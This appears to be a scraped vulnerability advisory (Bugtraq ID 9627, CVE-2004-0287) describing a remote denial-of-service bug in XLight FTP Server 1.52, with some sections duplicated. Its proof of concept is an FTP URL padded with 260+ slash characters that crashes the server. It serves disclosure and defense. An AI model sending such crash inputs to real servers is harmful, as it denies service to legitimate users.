XLight FTP Server Remote Denial Of Service Vulnerability
BID:9627
Info
XLight FTP Server Remote Denial Of Service Vulnerability
| Bugtraq ID: | 9627 |
| Class: | Boundary Condition Error |
| CVE: |
CVE-2004-0287 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 10 2004 12:00AM |
| Updated: | Jul 12 2009 02:06AM |
| Credit: | Discovery of this issue has been credited to "intuit e.b." <[email protected]>. |
| Vulnerable: |
XLight FTP Server XLight FTP Server 1.52 |
| Not Vulnerable: | |
Discussion
XLight FTP Server Remote Denial Of Service Vulnerability
A remote denial of service vulnerability has been reported to exist in the XLight FTP server. Due to this issue a remote attacker may be able cause the affected server to crash, denying service to legitimate users. This issue is due to insufficient bounds checking.
A remote denial of service vulnerability has been reported to exist in the XLight FTP server. Due to this issue a remote attacker may be able cause the affected server to crash, denying service to legitimate users. This issue is due to insufficient bounds checking.
Exploit / POC
XLight FTP Server Remote Denial Of Service Vulnerability
Currently we are not aware of any exploits for this issue. The following proof of concept, which forces the server process to crash, has been provided. Submitting 260 or more bytes to the affected process will cause the server to crash:
-----------------------------------------------------------------------
ftp://[email protected]////////////////////////////////
////////////////////////////////////////////////////
////////////////////////////////////////////////////
////////////////////////////////////////////////////
////////////////////////////////////////////////////
/////////////////////
-----------------------------------------------------------------------
Currently we are not aware of any exploits for this issue. The following proof of concept, which forces the server process to crash, has been provided. Submitting 260 or more bytes to the affected process will cause the server to crash:
-----------------------------------------------------------------------
ftp://[email protected]////////////////////////////////
////////////////////////////////////////////////////
////////////////////////////////////////////////////
////////////////////////////////////////////////////
////////////////////////////////////////////////////
/////////////////////
-----------------------------------------------------------------------
Solution / Fix
XLight FTP Server Remote Denial Of Service Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
XLight FTP Server Remote Denial Of Service Vulnerability
References:
References:
- Product Homepage (XLight FTP Server)
- Remote crash Xlight ftp server 1.52 ("intuit e.b."
)